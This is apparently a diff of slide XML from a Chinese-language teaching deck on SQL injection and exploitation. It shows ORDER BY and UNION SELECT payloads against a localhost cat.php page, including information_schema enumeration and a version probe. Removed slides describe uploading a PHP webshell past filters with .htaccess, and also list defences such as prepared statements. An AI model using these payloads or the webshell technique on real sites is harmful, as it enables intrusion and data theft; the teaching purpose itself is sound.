+          <p:cNvPr id="2" name="标题 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="913149" y="254657"/>
+            <a:ext cx="10364451" cy="1596177"/>
           </a:xfrm>
         </p:spPr>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
+            <a:normAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>   MYSQL5.0</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>以后包含数据库</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>information_schema</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>，我可利用它个数据 库构建语句</a:t>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0"/>
+              <a:t>SQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
+              <a:t>注入</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0"/>
+              <a:t>和利用</a:t>
+            </a:r>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="内容占位符 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph sz="quarter" idx="13"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="913774" y="1850834"/>
+            <a:ext cx="10698004" cy="3940365"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>②使用</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>ORDER </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>BY	</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>使用</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>ORDER BY </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>语句，返回的结果会根据</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>ORDER BY </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>语句选择的列进行排序，</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>ORDER BY</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>后可以是列名，也可以是第几列的数字，如果列数超出现有值，数据库会报错。因此可以通过这个方法可以找到最后一</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>。</a:t>
+              <a:t>列</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>  </a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>http://localhost/cat.php?id=1%20order%20by%205  </a:t>
             </a:r>
             <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
           </a:p>
           <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
             <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
           </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>1 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>UNION SELECT 1,table_name,3,4 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>FROM </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
-              <a:t>information_schema.tables</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>1 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>UNION SELECT 1,column_name,3,4 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>FROM </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
-              <a:t>information_schema.columns</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>1 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>UNION SELECT 1, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>table_name</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>, column_name,4 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>FROM </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
-              <a:t>information_schema.columns</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>1 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>UNION SELECT  1,concat(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>table_name</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>,':', </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>column_name</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>),3,4 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>FROM </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
-              <a:t>information_schema.columns</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>比较上面几个语句，后面一个使查询结果变得更直观。可以清楚地知道</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>information_schema</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>数据库中表与字段。</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="4" name="标题 1"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks/>
-          </p:cNvSpPr>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="5" name="图片 4"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
           <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="913149" y="254657"/>
-            <a:ext cx="10364451" cy="1596177"/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="776671" y="3821016"/>
+            <a:ext cx="9882230" cy="2694208"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
           </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
-            <a:normAutofit/>
-          </a:bodyPr>
-          <a:lstStyle>
-            <a:lvl1pPr algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPct val="0"/>
-              </a:spcBef>
-              <a:buNone/>
-              <a:defRPr sz="3600" kern="1200" cap="all" baseline="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mj-lt"/>
-                <a:ea typeface="+mj-ea"/>
-                <a:cs typeface="+mj-cs"/>
-              </a:defRPr>
-            </a:lvl1pPr>
-          </a:lstStyle>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" smtClean="0"/>
-              <a:t>SQL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" smtClean="0"/>
-              <a:t>注入和利用</a:t>
-            </a:r>
-            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+          <a:effectLst>
+            <a:softEdge rad="112500"/>
+          </a:effectLst>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4111314253"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="257913969"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -8007,7 +8339,7 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="913149" y="288011"/>
+            <a:off x="913149" y="254657"/>
             <a:ext cx="10364451" cy="1596177"/>
           </a:xfrm>
         </p:spPr>
@@ -8018,16 +8350,16 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0"/>
+              <a:t>SQL</a:t>
+            </a:r>
+            <a:r>
               <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
-              <a:t>绕过过滤上传</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1" smtClean="0"/>
-              <a:t>WebShell</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
+              <a:t>注入</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0"/>
+              <a:t>和利用</a:t>
             </a:r>
             <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0"/>
           </a:p>
@@ -8045,8 +8377,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1156776" y="1762699"/>
-            <a:ext cx="10223647" cy="4560983"/>
+            <a:off x="913149" y="1327385"/>
+            <a:ext cx="10840597" cy="3940365"/>
           </a:xfrm>
         </p:spPr>
         <p:txBody>
@@ -8055,150 +8387,164 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>用账号密码登陆网站，找到上传文件位置，上传一个</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>php</a:t>
-            </a:r>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
             <a:r>
               <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>脚本 </a:t>
-            </a:r>
+              <a:t>试信息：</a:t>
+            </a:r>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
             <a:r>
               <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>( .php3 )</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
+              <a:t>	</a:t>
+            </a:r>
             <a:r>
               <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>如果</a:t>
+              <a:t>利用</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>MYSQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>自带的</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>函数</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>version</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>(),</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
-              <a:t>php</a:t>
+              <a:t>current_user</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>()</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>文件被过滤了则可选用   </a:t>
+              <a:t>和</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>database</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>htaccess</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>文件（</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>它与</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>windows</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>的</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>autorun.inf</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>有点</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>类似）</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>htaccess</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>文件</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>或者</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>"</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>分布式配置文件</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>"</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>）提供了针对目录改变配置的方法， 即，在一个特定的文档目录中放置一个包含一个或多个指令的文件， 以作用于此目录及其所有子目录。作为用户，所能使用的命令受到限制。管理员可以通过</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>Apache</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>的</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>AllowOverride</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>指令来设置。</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>这里</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>所能执行的命令与应用的权限有关系，如果应用安装时是管理员账号，攻击者会获取到管理员的权限。</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>出于安全，应用应在普通用户下安装，并给该用户尽可能低的权限。</a:t>
-            </a:r>
+              <a:t>()</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="1" dirty="0" smtClean="0"/>
+              <a:t>The database version</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="1" dirty="0"/>
+              <a:t>:</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0" smtClean="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>http</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>://localhost/cat.php?id=1%20UNION%20SELECT%201,@@</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0" smtClean="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>version,3,4</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" i="1" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" i="1" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
           </a:p>
           <a:p>
             <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="5" name="图片 4"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="913149" y="4052815"/>
+            <a:ext cx="8192070" cy="1365345"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4243551781"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1790884363"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -8235,7 +8581,12 @@
             <p:ph type="title"/>
           </p:nvPr>
         </p:nvSpPr>
-        <p:spPr/>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="913149" y="254657"/>
+            <a:ext cx="10364451" cy="1596177"/>
+          </a:xfrm>
+        </p:spPr>
         <p:txBody>
           <a:bodyPr>
             <a:normAutofit/>
@@ -8243,12 +8594,16 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0"/>
+              <a:t>SQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
+              <a:t>注入</a:t>
+            </a:r>
+            <a:r>
               <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0"/>
-              <a:t>防御</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
-              <a:t>措施</a:t>
+              <a:t>和利用</a:t>
             </a:r>
             <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0"/>
           </a:p>
@@ -8264,72 +8619,157 @@
             <p:ph sz="quarter" idx="13"/>
           </p:nvPr>
         </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="913149" y="1327385"/>
+            <a:ext cx="10840597" cy="3940365"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
-              <a:t>采用</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
-              <a:t>sql</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
-              <a:t>语句预编译和绑定变量，是防御</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
-              <a:t>sql</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
-              <a:t>注入的最佳</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
-              <a:t>方法</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
-              <a:t>严格</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
-              <a:t>检查参数</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
-              <a:t>的数据类型，还有可以使用一些安全函数，来防御</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
-              <a:t>sql</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
-              <a:t>注入</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>试信息：</a:t>
+            </a:r>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>	</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>利用</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>MYSQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>自带的函数</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>version(),</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
